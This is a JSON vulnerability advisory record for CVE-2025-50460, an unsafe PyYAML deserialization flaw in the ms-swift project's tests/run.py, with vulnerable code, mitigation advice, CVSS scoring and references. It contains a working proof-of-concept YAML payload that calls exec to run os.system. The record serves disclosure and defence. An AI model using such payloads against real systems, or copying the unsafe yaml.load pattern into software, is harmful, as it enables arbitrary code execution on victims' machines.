{"id":"CVE-2025-50460","aliases":["PYSEC-2026-1683"],"url":"https://o3.security/vulnerability/CVE-2025-50460","summary":"MS SWIFT Remote Code Execution via unsafe PyYAML deserialization","details":"## Description\n\nA Remote Code Execution (RCE) vulnerability exists in the [modelscope/ms-swift](https://github.com/modelscope/ms-swift) project due to unsafe use of `yaml.load()` in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in the `tests/run.py` script, where a user-supplied YAML configuration file is deserialized using `yaml.load()` with `yaml.FullLoader`.\n\nIf an attacker can control or replace the YAML configuration file provided to the `--run_config` argument, they may inject a malicious payload that results in arbitrary code execution.\n\n## Affected Repository\n\n- **Project:** [modelscope/ms-swift](https://github.com/modelscope/ms-swift)\n- **Affect versions:** latest\n- **File:** `tests/run.py`\n- **GitHub Permalink:** https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420\n- **Dependency:** PyYAML <= 5.3.1\n\n## Vulnerable Code\n\n```python\nif args.run_config is not None and Path(args.run_config).exists():\n    with open(args.run_config, encoding='utf-8') as f:\n        run_config = yaml.load(f, Loader=yaml.FullLoader)\n```\n\n## Proof of Concept (PoC)\n\n### Step 1: Create malicious YAML file (`exploit.yaml`)\n\n```yaml\n!!python/object/new:type\nargs: [\"z\", !!python/tuple [], {\"extend\": !!python/name:exec }]\nlistitems: \"__import__('os').system('mkdir HACKED')\"\n```\n\n### Step 2: Execute with vulnerable PyYAML (<= 5.3.1)\n\n```python\nimport yaml\n\nwith open(\"exploit.yaml\", \"r\") as f:\n    cfg = yaml.load(f, Loader=yaml.FullLoader)\n```\n\nThis results in execution of `os.system`, proving code execution.\n\n## Mitigation\n\n* Replace `yaml.load()` with `yaml.safe_load()`\n* Upgrade PyYAML to version 5.4 or later\n\n### Example Fix:\n\n```python\n# Before\nyaml.load(f, Loader=yaml.FullLoader)\n\n# After\nyaml.safe_load(f)\n```\n\n\n## Author\n\n* Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩)\n* Contact: *\\[[anchor.rongyu020221@gmail.com](mailto:anchor.rongyu020221@gmail.com)]*","published":"2025-07-31T14:02:34Z","modified":"2026-07-07T17:57:29.103679620Z","cvss":{"score":9.8,"severity":"CRITICAL","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},"epss":null,"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"PyPI","name":"ms-swift","fixedVersion":null}],"fix":{"url":"https://github.com/modelscope/ms-swift/pull/5174","label":"modelscope/ms-swift#5174"},"references":[{"type":"WEB","url":"https://github.com/modelscope/ms-swift/security/advisories/GHSA-fm6c-f59h-7mmg"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-50460"},{"type":"WEB","url":"https://github.com/modelscope/ms-swift/pull/5174"},{"type":"WEB","url":"https://github.com/modelscope/ms-swift/commit/b3418ed9b050dc079553c275c5ed14cfb2b66cf7"},{"type":"WEB","url":"https://github.com/Anchor0221/CVE-2025-50460"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-6757-jp84-gxfx"},{"type":"PACKAGE","url":"https://github.com/modelscope/ms-swift"},{"type":"WEB","url":"https://github.com/modelscope/ms-swift/blob/main/tests/run.py#L420"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-07-07T17:57:29.103679620Z"}}